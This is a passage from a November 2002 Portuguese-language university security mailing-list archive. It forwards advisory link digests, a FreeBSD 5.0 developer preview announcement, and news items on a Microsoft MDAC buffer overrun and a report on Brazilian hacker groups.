http://www.security.unicamp.br/docs/bugs/2002/11/v62.txt FreeBSD Security Advisory (FreeBSD-SA-02:41) Assunto: Vulnerabilidade de Seguranca no pacote contrib_sendmail http://www.security.unicamp.br/docs/bugs/2002/11/v61.txt 14/11/2002 ---------- SCO Security Advisory (CSSA-2002-046.0) Assunto: Vulnerabilidade de Seguranca no pacote squid http://www.security.unicamp.br/docs/bugs/2002/11/v60.txt SCO Security Advisory (CSSA-2002-045.0) Assunto: Vulnerabilidade de Seguranca no pacote python http://www.security.unicamp.br/docs/bugs/2002/11/v59.txt Debian Security Advisory (DSA 196-1) Assunto: Vulnerabilidade de Seguranca no pacote Bind http://www.security.unicamp.br/docs/bugs/2002/11/v58.txt Mandrake Linux Security(MDKSA-2002:077) Assunto: Vulnerabilidade de Seguranca no pacote Bind http://www.security.unicamp.br/docs/bugs/2002/11/v57.txt SuSE Security(SuSE-SA:2002:044) Assunto: Multiple vulnerabilities in BIND8 http://www.security.unicamp.br/docs/bugs/2002/11/v56.txt EnGarde Secure Linux Security Advisory(ESA-20021114-029) Assunto: Vulnerabilidade de Seguranca nos pacotes bind-chroot, bind-chroot-utils http://www.security.unicamp.br/docs/bugs/2002/11/v55.txt Gentoo Linux Security(200211-004) Assunto: rlogin.protocol and telnet.protocol URL KIO Vulnerability resLISa / LISa Vulnerabilities(kdelibs) http://www.security.unicamp.br/docs/bugs/2002/11/v54.txt Gentoo Linux Security(200211-004) Assunto: rlogin.protocol and telnet.protocol URL KIO Vulnerability resLISa / LISa Vulnerabilities(kdenetwork) http://www.security.unicamp.br/docs/bugs/2002/11/v53.txt FreeBSD Security Advisory(FreeBSD-SA-02:43) Assunto: multiple vulnerabilities in BIND http://www.security.unicamp.br/docs/bugs/2002/11/v52.txt 12/11/2002 ---------- SCO Security Advisory (CSSA-2002-SCO.42) Assunto: UnixWare 7.1.1 Open UNIX 8.0.0 : in.talkd format string vulnerabilitieshttp://www.security.unicamp.br/docs/bugs/2002/11/v51.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Thu Nov 21 14:46:24 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 21 Nov 2002 14:46:24 -0200 Subject: [SECURITY-L] FreeBSD 5.0 Developer Preview #2 Now Available Message-ID: <20021121164624.GA1001@ccuec.unicamp.br> ----- Forwarded message from "Bruce A. Mah" ----- From: bmah em freebsd.org (Bruce A. Mah) Subject: FreeBSD 5.0 Developer Preview #2 Now Available To: freebsd-announce em freebsd.org Cc: bmah em freebsd.org Date: Mon, 18 Nov 2002 16:39:13 -0800 X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 The FreeBSD Project is proud to announce the availability of the second Developer Preview snapshot of FreeBSD 5.0 (5.0-DP2). This snapshot, intended for widespread testing purposes, is the latest milestone towards the eventual release of FreeBSD 5.0-RELEASE, currently scheduled for mid-December 2002. Since the release of 5.0-DP1, a number of new features have been added on the CURRENT development branch. A few of these include: o The GEOM disk geometry module and the GBDE on-disk encryption system. o A compiler toolchain based on GCC 3.2. o A new extensible Mandatory Access Control framework, the TrustedBSD MAC Framework. o The new UFS2 on-disk format, with support for larger filesystems and extended file attributes. o Support for Firewire devices. o Experimental support for the RAIDframe software RAID disk driver. Much more information can be found in the release documentation, as described below. WARNING This snapshot is not a supported release, and has not undergone any of the usual quality assurance checking that is a part of normal FreeBSD releases. It may include serious software bugs. Do not install this software on a machine where important data may be put at risk. The purpose of this snapshot is to get wider exposure to FreeBSD 5.0's new features, in advance of the release. As such, we expect that testers of 5.0-DP2 will follow the technical discussions on the freebsd-current@ mailing list. AVAILABILITY FreeBSD 5.0-DP2 is being released for the alpha, ia64, i386, pc98, and sparc64 architectures. As of this writing, 5.0-DP2/i386 is available, with other architectures to follow soon. The checksums for the two i386 ISO images are as follows: MD5 (5.0-DP2-disc1.iso) = 997ef9ed5aa3e0721678f5482d2fc664 MD5 (5.0-DP2-disc2.iso) = 425718dbf1b771c8317556b7a13842c6 Before trying the central FTP site, we strongly recommend that you check FTP mirror sites in your country or region, such as: ftp://ftp..FreeBSD.org/pub/FreeBSD/ Any additional mirror sites will be named ftp2, ftp3, and so forth. Appendix A of the FreeBSD Handbook has additional information about FreeBSD mirror sites; it is available on-line at: http://www.FreeBSD.org/doc/en_US.ISO8859-1/books/handbook/mirrors-ftp.html Some of the mirror sites known to carry 5.0-DP2 (in alphabetical order by country code) are: ftp://ftp.FreeBSD.org/pub/FreeBSD/ ftp://ftp2.FreeBSD.org/pub/FreeBSD/ ftp://ftp2.at.FreeBSD.org/pub/FreeBSD/ ftp://ftp.au.FreeBSD.org/pub/FreeBSD/ ftp://ftp4.de.FreeBSD.org/pub/FreeBSD/ ftp://ftp.dk.FreeBSD.org/pub/FreeBSD/ Release documentation is available in the distributions, as well as on the FreeBSD Web site: Release notes: http://www.FreeBSD.org/releases/5.0R/DP2/relnotes.html Hardware notes: http://www.FreeBSD.org/releases/5.0R/DP2/hardware.html Errata: http://www.FreeBSD.org/releases/5.0R/DP2/errata.html Early Adopter's Guide: http://www.FreeBSD.org/releases/5.0R/DP2/early-adopter.html LATE-BREAKING NEWS Certain parts of the KDE and GNOME desktop environments did not make it to the package sets in the i386 ISO images. The sparc64 and ia64 snapshots may or may not have package sets associated with them. ACKNOWLEDGEMENTS The FreeBSD Project wishes to thank the companies, developers, and users who continue to make FreeBSD releases possible. Many companies donated equipment, network access, or person-hours to finance our ongoing release engineering activities, including The FreeBSD Mall, Compaq, Yahoo!, Sentex Communications, NTT/Verio, and Packet Design. We greatly appreciate their contributions. The release engineering team for 5.0-DP2 includes: Murray Stokely Release Engineering Team Lead John Baldwin Release Engineering, alpha and sparc64 Builds Scott Long Developer Communications Bruce A. Mah Release Documentation, i386 Build Robert Watson Release Engineering, Security Marcel Moolenaar ia64 Build TAKAHASHI Yoshihiro pc98 Build Kris Kennaway i386 and alpha Package Builds FreeBSD 5.0-DP2 is, as with every release, a cooperative effort of all of the FreeBSD committers , as well as FreeBSD users all over the world who have submitted new features, bug fixes, and suggestions. Please join us in thanking everyone for their hard work in polishing and improving the state of the FreeBSD -CURRENT development branch. We'd like to emphasize once again that this snapshot represents a work-in-progress. Please help us by testing it now, so that we can make FreeBSD 5.0-RELEASE as stable and useful as possible. Thanks! Bruce A. Mah (For the FreeBSD Release Engineering Team) ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 21 14:59:13 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 21 Nov 2002 14:59:13 -0200 Subject: [SECURITY-L] Bug grave em banco de dados do Windows abre servidor para hacker Message-ID: <20021121165912.GD1001@ccuec.unicamp.br> ----- Forwarded message from Caio Souza Mendes ----- From: Caio Souza Mendes Subject: Bug grave em banco de dados do Windows abre servidor para hacker To: daniela em ccuec.unicamp.br Date: Wed, 20 Nov 2002 18:56:24 -0300 (ART) 20/11/2002 - 17h03 Bug grave em banco de dados do Windows abre servidor para hacker da Folha Online A Microsoft emitiu hoje o alerta sobre uma vulnerabilidade no recurso do Windows responsável pelo bom funcionamento dos bancos de dados. Pela falha, um hacker pode rodar no sistema qualquer código que quiser, na quantidade que desejar. Isso pode paralisar o banco de dados, segundo a Microsoft. Os MDAC (Microsoft Data Access Components) são um conjunto de componentes utilizados para conectar bancos de dados às plataformas Windows e estão na maioria dos sistemas operacionais da Microsoft --é incluído automaticamente nas versões XP, 2000 e Millenium do Windows. Para as demais, está disponível para download como um tecnologia separada para os sistemas. Esse conjunto de componentes é responsável pela funcionalidade da maioria das operações dos bancos de dados, como a conexão remota e o retorno de dados para o cliente. Um dos componentes do MDAC, conhecido como RDS (Remote Data Services), é responsável pelo suporte de três arquiteturas dependentes umas das outras, arquiteturas nas quais a solicitação de um serviço feita por um banco de dados é intermediada por um site que lhe atribui lógica. É justamente na implementação do RDS que está a vulnerabilidade anunciada pela Microsoft, especificamente, em uma função chamada RDS Data Stub, que tem como objetivo analisar as requisições HTTP e gerar os comandos RDS. A vulnerabilidade acontece por causa de um buffer não verificado no Data Stub. O buffer é uma área específica onde os dados ficam armazenados antes de serem processados. Ao enviar uma solicitação HTTP defeituosa para o Data Stub, um hacker pode fazer com que os dados de sua escolha rodem no sistema atacado, seja a máquina do usuário ou o servidor da rede. Além disso, é possível enviar uma quantidade muito grande de dados, causando o que os especialistas chamam de buffer overrun, que leva à paralisação do sistema. Segundo a própria Microsoft, o bug é grave e a empresa recomenda que o arquivo de correção seja instalado o quanto antes. Mais detalhes sobre a falha de segurança, bem como o arquivo de correção para ela podem ser encontrados no site www.microsoft.com/technet/security/bulletin/ms02-065.asp Fonte: Folha Online - http://www1.uol.com.br/folha/informatica/ult124u11634.shtml ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 21 14:51:14 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 21 Nov 2002 14:51:14 -0200 Subject: [SECURITY-L] Noticias-CAIS: Brasil lidera ranking mundial de hackers e crimes virtuais Message-ID: <20021121165114.GB1001@ccuec.unicamp.br> ----- Forwarded message from Jacomo Dimmit Boca Piccolini ----- From: Jacomo Dimmit Boca Piccolini Subject: [S] Noticias-CAIS: Brasil lidera ranking mundial de hackers e crimes virtuais To: seguranca em pangeia.com.br Date: Tue, 19 Nov 2002 14:47:28 -0200 (EDT) Noticias - Centro de Atendimento a Incidentes de Seguranca (CAIS/RNP) --------------------------------------------------------------------- [fonte:http://www1.uol.com.br/folha/informatica/ult124u11609.shtml] Brasil lidera ranking mundial de hackers e crimes virtuais FERNANDA K. ÂNGELO da Folha Online O Brasil conquistou o título de maior laboratório do cibercrime em todo o mundo, segundo um levantamento feito pela mi2g. Os criminosos digitais brasileiros agem em campos diversos, como roubo de identidade, fraudes de cartão de crédito, violação de propriedade intelectual e protestos políticos. De acordo com a empresa norte-americana de segurança da informação, a cópia de software e dados protegidos por direitos autorais e pirataria, bem como o vandalismo on-line, são alguns dos métodos ilícitos cada vez mais adotados por hackers brasileiros. Outro recorde alcançado pelos piratas do Brasil foi o número de grupos de hackers na lista TOP 10, dos "dez mais ativos". O Brasil ocupa todas as posições --sim, os dez grupos hackers que mais atuaram durante o mês de novembro de 2002 são brasileiros. Desses, os cinco mais ativos são BYS (Breaking Your Security), Ir4dex, Endiabrad0s, Virtual Hell e rya (Rooting Your Admin). Com isso, eles conseguiram que o português se tornasse a língua oficial do movimento hacker na internet. Facilidade A proliferação de ferramentas gratuitas para ataques, as poucas leis para a prevenção dos crimes digitais e o crescente índice de grupos organizados para explorar oportunidades para o cibercrime são as principais causas apontadas pelo estudo para o aumento dessas ações na internet. Poucos hackers brasileiros têm a mesma especialização em computadores como têm os europeus que vêm atacando desde os anos 90, que até mesmo chegaram a escrever seus próprios programas para garantir ataques bem sucedidos. Atualmente, o Brasil parece não ser a principal fonte de criação de vírus. Apenas quatro dos 296 novos vírus e cavalos de Tróia descobertos em 2002 foram desenvolvidos no Brasil. Prejuízo "Desde 1995, foram poucas as vezes que um único país dominou a atividade criminal no ciberespaço como o Brasil fez agora. A atividade hacker no Brasil em 2002 custou bilhões de dólares aos países do G-8 [as oito nações mais ricas do mundo --EUA, Japão, Alemanha, França, Reino Unido, Itália, Canadá e Rússia]", disse DK Matai, presidente da mi2g. Para ele, "agora trata-se de uma questão mundial. Os países do G-8 terão que pressionar as autoridades brasileiras para tomarem as medidas apropriadas para impedir ou reduzir essa exportação ilícita". As cinco principais vítimas dos ataques digitais detectados em 2002 até agora são os EUA (24.611), o Brasil (4.874), Reino Unido (4.735), Alemanha (4.474) e a Itália (2.565). Segundo a mi2g, os grupos que mais atacaram sistemas instalados nos EUA também foram os brasileiros --Endiabrad0s (398), Ir4dex (378) e Virtual Hell (351). Estima-se que as perdas da economia mundial causadas por ataques digitais e vírus fiquem entre US$ 27 bilhões e US$ 45 bilhões em 2002. ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 21 14:55:37 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 21 Nov 2002 14:55:37 -0200 Subject: [SECURITY-L] MS renova servico de seguranca para leigos em tecnologia Message-ID: <20021121165537.GC1001@ccuec.unicamp.br> ----- Forwarded message from Caio Souza Mendes ----- From: Caio Souza Mendes Subject: MS renova serviXo de seguranXa para leigos em tecnologia To: daniela em ccuec.unicamp.br Date: Wed, 20 Nov 2002 10:45:49 -0300 (ART) MS renova serviço de segurança para leigos em tecnologia Terça-feira, 19 de Novembro de 2002 - 18h15 IDG Now! A Microsoft está disposta a melhorar a segurança dos computadores de usuários finais que não são muito conhecedores de tecnologia. A desenvolvedora resolveu modificar a forma pela qual ela classificava os assuntos de segurança em seus boletins, após registrar diversas reclamações de clientes. Os usuários diziam que o antigo sistema falhava ao não identificar os assuntos que eram realmente importantes para eles. Muitos clientes finais acham os boletins de segurança atuais da Microsoft "detalhados e confusos demais", disse Steve Lipner, diretor de assuntos de segurança da companhia. Além disso, a Microsoft envia alertas de todos os seus produtos em uma mesma lista. Isso significa que os usuários domésticos também recebem alertas sobre SQL Server, produto de banco de dados da empresa voltado para o segmento corporativo. Além dos boletins técnicos publicados através do TechNet, a Microsoft irá criar agora informativos direcionados exclusivamente para usuários finais. Esses boletins, hospedados no site www.microsoft.com/security, irão descrever de forma mais clara o que os usuários devem fazer para manter seus sistemas mais seguros, disse Lipner. Um serviço de alerta para esses novos boletins deve entrar em operação no final do ano. Os atuais boletins de segurança oferecidos no TechNet continuarão a incluir detalhes técnicos para ajudar os profissionais de TI com patches e correções de bugs, informou a desenvolvedora. Fonte: IDG Now - http://idgnow.terra.com.br/idgnow/pcnews/2002/11/0033 ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 21 17:10:54 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 21 Nov 2002 17:10:54 -0200 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20021121191054.GA1388@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 15/11/2002 ---------- Trustix Secure Linux Security Advisory #2002-0076 Assunto: vulnerabilidade de seguranca no bind. http://www.security.unicamp.br/docs/bugs/2002/11/v69.txt Trustix Secure Linux Security Advisory #2002-0077 Assunto: vulnerabilidade de seguranca no kernel. http://www.security.unicamp.br/docs/bugs/2002/11/v70.txt 18/11/2002 ---------- Debian Security Advisory (DSA 198-1) Assunto: vulnerabilidade de seguranca no pacote nullmailer. http://www.security.unicamp.br/docs/bugs/2002/11/v71.txt Anúncio de segurança do Conectiva Linux (CLA-2002:549) Assunto: Vulnerabilidade na expansão de caracteres no pacote dhcpcd. http://www.security.unicamp.br/docs/bugs/2002/11/v72.txt SCO Security Advisory (CSSA-2002-048.0) Assunto: Linux: wwwoffled remote access vulnerability. http://www.security.unicamp.br/docs/bugs/2002/11/v73.txt SCO Security Advisory (CSSA-2002-049.0) Assunto: Linux: lynx CRLF injection vulnerability. http://www.security.unicamp.br/docs/bugs/2002/11/v74.txt Mandrake Linux Security Update Advisory (MDKSA-2002:078) Assunto: vulnerabilidade de seguranca no pacote ypserv. http://www.security.unicamp.br/docs/bugs/2002/11/v75.txt 19/11/2002 ---------- Debian Security Advisory (DSA 199-1) Assunto: vulnerabilidade de seguranca no pacote mhonarc. http://www.security.unicamp.br/docs/bugs/2002/11/v76.txt 20/11/2002 ---------- NetBSD Security Advisory (2002-027) Assunto: ftpd STAT output non-conformance can deceive firewall devices. http://www.security.unicamp.br/docs/bugs/2002/11/v77.txt NetBSD Security Advisory (2002-028) Assunto: Buffer overrun in getnetbyname/getnetbyaddr. http://www.security.unicamp.br/docs/bugs/2002/11/v78.txt NetBSD Security Advisory (2002-029) Assunto: named(8) multiple denial of service and remote execution of code. http://www.security.unicamp.br/docs/bugs/2002/11/v79.txt Cisco Security Advisory Assunto: Cisco PIX Multiple Vulnerabilities. http://www.security.unicamp.br/docs/bugs/2002/11/v80.txt Microsoft Security Bulletin (MS02-065) Assunto: Buffer Overrun in Microsoft Data Access Components Could Lead to Code Execution (Q329414). http://www.security.unicamp.br/docs/bugs/2002/11/v81.txt Microsoft Security Bulletin (MS02-066) Assunto: Cumulative Patch for Internet Explorer (Q328970). http://www.security.unicamp.br/docs/bugs/2002/11/v82.txt Revised: Microsoft Security Bulletin (MS02-050) Assunto: Certificate Validation Flaw Could Enable Identity Spoofing (Q329115). http://www.security.unicamp.br/docs/bugs/2002/11/v83.txt Slackware-security Assunto: New Samba package available. http://www.security.unicamp.br/docs/bugs/2002/11/v84.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From mieko em ccuec.unicamp.br Mon Nov 25 10:30:29 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Mon, 25 Nov 2002 10:30:29 -0200 Subject: [SECURITY-L] Vulnerabilidades de Seguranca Message-ID: <20021125123026.GA426@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 15/11/2002 ---------- Trustix Secure Linux Security Advisory #2002-0076 Assunto: vulnerabilidade de seguranca no bind. http://www.security.unicamp.br/docs/bugs/2002/11/v69.txt Trustix Secure Linux Security Advisory #2002-0077 Assunto: vulnerabilidade de seguranca no kernel. http://www.security.unicamp.br/docs/bugs/2002/11/v70.txt 18/11/2002 ---------- Debian Security Advisory (DSA 198-1) Assunto: vulnerabilidade de seguranca no pacote nullmailer. http://www.security.unicamp.br/docs/bugs/2002/11/v71.txt Anúncio de segurança do Conectiva Linux (CLA-2002:549) Assunto: Vulnerabilidade na expansão de caracteres no pacote dhcpcd. http://www.security.unicamp.br/docs/bugs/2002/11/v72.txt SCO Security Advisory (CSSA-2002-048.0) Assunto: Linux: wwwoffled remote access vulnerability. http://www.security.unicamp.br/docs/bugs/2002/11/v73.txt SCO Security Advisory (CSSA-2002-049.0) Assunto: Linux: lynx CRLF injection vulnerability. http://www.security.unicamp.br/docs/bugs/2002/11/v74.txt Mandrake Linux Security Update Advisory (MDKSA-2002:078) Assunto: vulnerabilidade de seguranca no pacote ypserv. http://www.security.unicamp.br/docs/bugs/2002/11/v75.txt 19/11/2002 ---------- Debian Security Advisory (DSA 199-1) Assunto: vulnerabilidade de seguranca no pacote mhonarc. http://www.security.unicamp.br/docs/bugs/2002/11/v76.txt 20/11/2002 ---------- NetBSD Security Advisory (2002-027) Assunto: ftpd STAT output non-conformance can deceive firewall devices. http://www.security.unicamp.br/docs/bugs/2002/11/v77.txt NetBSD Security Advisory (2002-028) Assunto: Buffer overrun in getnetbyname/getnetbyaddr. http://www.security.unicamp.br/docs/bugs/2002/11/v78.txt NetBSD Security Advisory (2002-029) Assunto: named(8) multiple denial of service and remote execution of code. http://www.security.unicamp.br/docs/bugs/2002/11/v79.txt Cisco Security Advisory Assunto: Cisco PIX Multiple Vulnerabilities. http://www.security.unicamp.br/docs/bugs/2002/11/v80.txt Microsoft Security Bulletin (MS02-065) Assunto: Buffer Overrun in Microsoft Data Access Components Could Lead to Code Execution (Q329414). http://www.security.unicamp.br/docs/bugs/2002/11/v81.txt Microsoft Security Bulletin (MS02-066) Assunto: Cumulative Patch for Internet Explorer (Q328970). http://www.security.unicamp.br/docs/bugs/2002/11/v82.txt Revised: Microsoft Security Bulletin (MS02-050) Assunto: Certificate Validation Flaw Could Enable Identity Spoofing (Q329115). http://www.security.unicamp.br/docs/bugs/2002/11/v83.txt Slackware-security Assunto: New Samba package available. http://www.security.unicamp.br/docs/bugs/2002/11/v84.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From mieko em ccuec.unicamp.br Mon Nov 25 13:00:11 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Mon, 25 Nov 2002 13:00:11 -0200 Subject: [SECURITY-L] Vulnerabilidades de Seguranca Message-ID: <20021125150010.GA562@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 19/11/2002 ---------- Gentoo Linux Security Announcement(200211-005) Assunto: vulnerabilidade de seguranca no pacote courier http://www.security.unicamp.br/docs/bugs/2002/11/v85.txt DEFENSE Security Advisory (11.19.02c) Assunto: vulnerabilidade de seguranca no Netscape http://www.security.unicamp.br/docs/bugs/2002/11/v86.txt Sun Microsystems (#00220) Assunto: Double Free bug in zlib compression library http://www.security.unicamp.br/docs/bugs/2002/11/v87.txt 20/11/2002 ---------- GENTOO LINUX SECURITY ANNOUNCEMENT (200211-005) Assunto: Vulnerabilidades de Seguranca nos pacotes php & mod_php http://www.security.unicamp.br/docs/bugs/2002/11/v88.txt GENTOO LINUX SECURITY ANNOUNCEMENT (200211-006) Assunto: Vulnerabilidades de Seguranca no pacote gtetrinet http://www.security.unicamp.br/docs/bugs/2002/11/v89.txt SuSE Security Announcement(SuSE-SA:2002:045) Assunto: Vulnerabilidade de Seguranca no pacote samba http://www.security.unicamp.br/docs/bugs/2002/11/v90.txt 21/11/2002 ---------- GENTOO LINUX SECURITY ANNOUNCEMENT (200211-007) Assunto: Vulnerabilidade de Seguranca no pacote samba http://www.security.unicamp.br/docs/bugs/2002/11/v91.txt CERT Advisory (CA-2002-32) Assunto: Backdoor in Alcatel OmniSwitch AOS http://www.security.unicamp.br/docs/bugs/2002/11/v92.txt SCO Security Advisory(CSSA-2002-052.0) Assunto: Linux: sendmail smrsh bypass vulnerabilities http://www.security.unicamp.br/docs/bugs/2002/11/v93.txt Mandrake Linux Security Update Advisory(MDKSA-2002:079) Assunto: Vulnerabilidade de Seguranca no pacote kdelibs http://www.security.unicamp.br/docs/bugs/2002/11/v94.txt Mandrake Linux Security Update Advisory(MDKSA-2002:080) Assunto: Vulnerabilidade de Seguranca no pacote kdenetwork http://www.security.unicamp.br/docs/bugs/2002/11/v95.txt EnGarde Secure Linux Security Advisory(ESA-20021122-030) Assunto: Vulnerabilidade de Seguranca no Kernel http://www.security.unicamp.br/docs/bugs/2002/11/v96.txt EnGarde Secure Linux Security Advisory(ESA-20021122-031) Assunto: Vulnerabilidade de Seguranca nos pacotes php, mod_php http://www.security.unicamp.br/docs/bugs/2002/11/v97.txt Red Hat Security Advisory(RHSA-2002:266-05) Assunto: New samba packages available to fix potential security vulnerability http://www.security.unicamp.br/docs/bugs/2002/11/v98.txt NGSSoftware Insight Security Research Advisory(#NISR22112002) Assunto: Multiple Buffer Overruns RealOne / RealPlayer / RealOne Enterprise Desktop http://www.security.unicamp.br/docs/bugs/2002/11/v99.txt CAIS-Alerta Assunto: CERT Advisory CA-2002-32 Backdoor in Alcatel OmniSwitch AOS http://www.security.unicamp.br/docs/bugs/2002/11/v100.txt CAIS-Alerta Assunto: Patch Acumulativo para o Internet Explorer (Q328970) http://www.security.unicamp.br/docs/bugs/2002/11/v101.txt CAIS-Alerta Assunto: Vulnerabilidade no Microsoft MDAC (Q326573) http://www.security.unicamp.br/docs/bugs/2002/11/v102.txt CAIS-Alerta Assunto: CERT Advisory CA-2002-33 Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC) http://www.security.unicamp.br/docs/bugs/2002/11/v103.txt Conectiva Linux(CLA-2002:550) Assunto: Vulnerabilidade de Seguranca no pacote samba http://www.security.unicamp.br/docs/bugs/2002/11/v104.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From mieko em unicamp.br Tue Nov 26 09:21:42 2002 From: mieko em unicamp.br (Silvana Mieko Misuta) Date: Tue, 26 Nov 2002 09:21:42 -0200 Subject: [SECURITY-L] [CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service] Message-ID: <3DE35946.81E7144C@unicamp.br> -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: CERT Advisory Assunto: CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service Data: Mon, 25 Nov 2002 19:54:51 -0500 Tamanho: 8791 URL: From mieko em unicamp.br Tue Nov 26 12:39:48 2002 From: mieko em unicamp.br (Silvana Mieko Misuta) Date: Tue, 26 Nov 2002 12:39:48 -0200 Subject: [SECURITY-L] [CAIS-ALERT: Vulnerability in the sending requests control of BIND] Message-ID: <3DE387B4.68026E1B@unicamp.br> -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: Vagner Sacramento Assunto: CAIS-ALERT: Vulnerability in the sending requests control of BIND Data: Mon, 25 Nov 2002 18:32:39 -0300 (EST) Tamanho: 9358 URL: From mieko em ccuec.unicamp.br Wed Nov 27 14:10:22 2002 From: mieko em ccuec.unicamp.br (Silvana) Date: Wed, 27 Nov 2002 14:10:22 -0200 Subject: [SECURITY-L] [Fwd: McAfee alerta para novo vXrus que ataca por e-mail] Message-ID: <3DE4EE6E.847F319E@ccuec.unicamp.br> -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: =?iso-8859-1?q?Caio=20Souza=20Mendes?= Assunto: McAfee alerta para novo vXrus que ataca por e-mail Data: Wed, 27 Nov 2002 12:55:30 -0300 (ART) Tamanho: 6008 URL: From mieko em ccuec.unicamp.br Wed Nov 27 14:11:16 2002 From: mieko em ccuec.unicamp.br (Silvana) Date: Wed, 27 Nov 2002 14:11:16 -0200 Subject: [SECURITY-L] [Fwd: Falha no Solaris abre o servidor] Message-ID: <3DE4EEA4.F8DB4C7B@ccuec.unicamp.br> -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: =?iso-8859-1?q?Caio=20Souza=20Mendes?= Assunto: Falha no Solaris abre o servidor Data: Wed, 27 Nov 2002 13:05:44 -0300 (ART) Tamanho: 3631 URL: From mieko em ccuec.unicamp.br Wed Nov 27 14:11:59 2002 From: mieko em ccuec.unicamp.br (Silvana) Date: Wed, 27 Nov 2002 14:11:59 -0200 Subject: [SECURITY-L] [Fwd: Defeitos ameaXam Internet Explorer] Message-ID: <3DE4EECF.19E609B1@ccuec.unicamp.br> -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: =?iso-8859-1?q?Caio=20Souza=20Mendes?= Assunto: Defeitos ameaXam Internet Explorer Data: Wed, 27 Nov 2002 13:09:05 -0300 (ART) Tamanho: 9164 URL: From mieko em ccuec.unicamp.br Wed Nov 27 15:56:18 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Wed, 27 Nov 2002 15:56:18 -0200 Subject: [SECURITY-L] [Fwd: CERT Summary CS-2002-04] Message-ID: <3DE50742.110FEE06@ccuec.unicamp.br> -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: CERT Advisory Assunto: CERT Summary CS-2002-04 Data: Tue, 26 Nov 2002 15:41:33 -0500 Tamanho: 10448 URL: From mieko em ccuec.unicamp.br Thu Nov 28 17:02:16 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Thu, 28 Nov 2002 17:02:16 -0200 Subject: [SECURITY-L] Vulnerabilidades de Seguranca Message-ID: <20021128190216.GA5612@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 27/11/2002 ---------- CAIS-ALERT Assunto: CAIS-Alerta: CERT Summary CS-2002-04 http://www.security.unicamp.br/docs/bugs/2002/11/v115.txt CAIS-ALERT Assunto: CAIS-Alerta: CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service http://www.security.unicamp.br/docs/bugs/2002/11/v114.txt EnGarde Secure Linux Security Advisory(ESA-20021127-032) Assunto: Vulnerabilidade de Seguranca no pacote pine http://www.security.unicamp.br/docs/bugs/2002/11/v113.txt 26/11/2002 ---------- CERT Summary (CS-2002-04) Assunto: Recent Activity http://www.security.unicamp.br/docs/bugs/2002/11/v112.txt 25/11/2002 ---------- CERT Advisory(CA-2002-34) Assunto: Buffer Overflow in Solaris X Window Font Service http://www.security.unicamp.br/docs/bugs/2002/11/v111.txt CAIS-ALERT Assunto: Vulnerability in the sending requests control of BIND versions 4 and 8 allows DNS spoofing http://www.security.unicamp.br/docs/bugs/2002/11/v110.txt Mandrake Linux Security Update Advisory(MDKSA-2002:082) Assunto: Vulnerabilidade de Seguranca no pacote python http://www.security.unicamp.br/docs/bugs/2002/11/v109.txt Mandrake Linux Security Update Advisory(MDKSA-2002:081) Assunto: Vulnerabilidade de Seguranca no pacote samba http://www.security.unicamp.br/docs/bugs/2002/11/v108.txt Red Hat Security Advisory (RHSA-2002:264-05) Assunto: New kernel 2.2 packages fix local denial of service issue http://www.security.unicamp.br/docs/bugs/2002/11/v107.txt Trustix Secure Linux Security Advisory (#2002-0080) Assunto: Vulnerabilidade de Seguranca no pacote samba http://www.security.unicamp.br/docs/bugs/2002/11/v106.txt SuSE Security (SuSE-SA:2002:046) Assunto: Vulnerabilidade de Seguranca no pacote pine http://www.security.unicamp.br/docs/bugs/2002/11/v105.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br